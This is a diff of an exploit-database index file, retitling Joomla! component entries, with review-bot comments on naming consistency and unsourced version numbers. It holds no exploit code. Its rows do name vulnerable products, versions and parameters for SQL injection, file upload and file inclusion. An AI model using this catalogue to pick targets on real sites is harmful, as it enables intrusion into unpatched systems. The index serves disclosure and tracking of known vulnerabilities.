36592,platforms/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36593,platforms/php/webapps/36593.txt,"Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
36594,platforms/php/webapps/36594.txt,"Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36595,platforms/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
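Review bot: Retitling 36591 from 'com_full' to "Joomla! Component Full" leaves a generic English word as the only product identifier, which makes the entry hard to find and easy to confuse in keyword searches. The unquoted identifier form used for 36589, 36594, 36595 and 36597 in this same hunk (com_br, com_boss, com_car, com_bulkenquery) would be the safer choice here. Note also that 36593 'com_xball' and 36596 'com_some' keep their quotes, so the hunk ends with three title styles.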
@ -34844,18 +34845,18 @@ id,file,description,date,author,platform,type,port
36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0
36624,platforms/php/webapps/36624.txt,"Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
36624,platforms/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0
36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0
36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0
36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0
36629,platforms/php/webapps/36629.txt,"Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
36630,platforms/php/webapps/36630.txt,"Joomla! Component 'com_products' - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0
36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0
36634,platforms/php/webapps/36634.txt,"Joomla! Component 'com_visa' - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
36638,platforms/php/webapps/36638.txt,"Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
36639,platforms/php/webapps/36639.txt,"Joomla! Component 'com_propertylab' - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0
36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0
@ -34863,7 +34864,7 @@ id,file,description,date,author,platform,type,port
36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0
36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0
36646,platforms/php/webapps/36646.txt,"Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0
36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
@ -34872,7 +34873,7 @@ id,file,description,date,author,platform,type,port
36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
36657,platforms/php/webapps/36657.txt,"Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0
36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0
@ -35000,7 +35001,7 @@ id,file,description,date,author,platform,type,port
36860,platforms/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
36863,platforms/php/webapps/36863.txt,"Joomla! Component 'com_machine' - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0
36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
@ -35352,12 +35353,12 @@ id,file,description,date,author,platform,type,port
37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0
37373,platforms/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37374,platforms/php/webapps/37374.txt,"Joomla! Component 'com_alphacontent' - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
37375,platforms/php/webapps/37375.php,"Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
37375,platforms/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0
37377,platforms/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
37378,platforms/php/webapps/37378.php,"Joomla! Component 'com_simpleswfupload' - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37379,platforms/php/webapps/37379.php,"Joomla! Component 'mod_artuploader' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37380,platforms/php/webapps/37380.php,"Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37380,platforms/php/webapps/37380.php,"Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37381,platforms/php/webapps/37381.html,"Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
37382,platforms/php/webapps/37382.php,"Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
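Review bot: The new 37380 title, "DentroVideo 1.2", adds a version number that the old 'com_dv' title did not carry, and nothing in this diff shows where 1.2 comes from. Please confirm it against platforms/php/webapps/37380.php and mention the source in the commit message, since users filter on the version in the title to decide whether an installation is affected. The com_dv identifier is also dropped; keeping it alongside the product name would preserve searches on the component name.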
@ -35375,10 +35376,10 @@ id,file,description,date,author,platform,type,port
37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0
37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0
37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0
37410,platforms/php/webapps/37410.php,"Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
37410,platforms/php/webapps/37410.php,"Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
37411,platforms/php/webapps/37411.txt,"WordPress Plugin ORGanizer - Multiple Vulnerabilities",2012-06-15,MustLive,php,webapps,0
37412,platforms/php/webapps/37412.php,"Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
37413,platforms/php/webapps/37413.txt,"Joomla! Component 'com_jcalpro' - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
37412,platforms/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
@ -35457,7 +35458,7 @@ id,file,description,date,author,platform,type,port
37514,platforms/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80
37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
37516,platforms/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
37519,platforms/php/webapps/37519.txt,"Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0
37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0
37522,platforms/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0
@ -35470,7 +35471,7 @@ id,file,description,date,author,platform,type,port
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI redirection",2012-07-29,"Aung Khant",php,webapps,0
37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
@ -35544,7 +35545,7 @@ id,file,description,date,author,platform,type,port
37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0
37648,platforms/php/webapps/37648.txt,"Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
37648,platforms/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
37649,platforms/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0
37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0
37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0
@ -35712,7 +35713,7 @@ id,file,description,date,author,platform,type,port
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
38008,platforms/php/webapps/38008.txt,"Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
38008,platforms/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0
38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0
@ -36106,7 +36107,7 @@ id,file,description,date,author,platform,type,port
38803,platforms/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80
38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
38777,platforms/php/webapps/38777.txt,"Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
38780,platforms/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
38783,platforms/php/webapps/38783.php,"WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0
38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0
@ -36120,7 +36121,7 @@ id,file,description,date,author,platform,type,port
38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0
38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0
38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0
38814,platforms/php/webapps/38814.php,"Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0
38819,platforms/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0
38820,platforms/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0
@ -36293,7 +36294,7 @@ id,file,description,date,author,platform,type,port
39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0
39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0
39140,platforms/php/webapps/39140.txt,"Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0
39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
@ -36493,7 +36494,7 @@ id,file,description,date,author,platform,type,port
39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80
39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80
39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80
39590,platforms/php/webapps/39590.txt,"Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
39590,platforms/php/webapps/39590.txt,"Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
@ -36614,7 +36615,7 @@ id,file,description,date,author,platform,type,port
39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
39936,platforms/php/webapps/39936.txt,"Joomla! Component 'com_payplans' 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
39936,platforms/php/webapps/39936.txt,"Joomla! Component com_payplans 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80
39946,platforms/php/webapps/39946.php,"WordPress Plugin Social Stream 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,php,webapps,80
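
Review bot: The replacement title for 39936 keeps the internal identifier (com_payplans 3.3.6) and only drops the quotes, while other rows renamed in this commit switch to the product name (39590 becomes "Easy Youtube Gallery 1.0.2", 40111 becomes "Guru Pro"). Pick one convention for the Joomla! component titles and apply it here and to 39953 in the next hunk; mixed forms make title searches over the index miss entries.
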
@ -36622,7 +36623,7 @@ id,file,description,date,author,platform,type,port
39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,php,webapps,80
39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80
39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80
39953,platforms/php/webapps/39953.txt,"Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
39953,platforms/php/webapps/39953.txt,"Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
@ -36635,7 +36636,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla! Component 'com_bt_media' - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla! Component com_bt_media 1.0 - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80
39982,platforms/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80
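
Review bot: The 39977 title gains a version, "1.0", that the quoted 'com_bt_media' title did not carry, and nothing in this hunk shows where it comes from. Confirm it against 39977.txt and state the affected version in that file as well, so the index row and the advisory do not diverge.
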
@ -36647,7 +36648,7 @@ id,file,description,date,author,platform,type,port
39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80
39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
40111,platforms/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
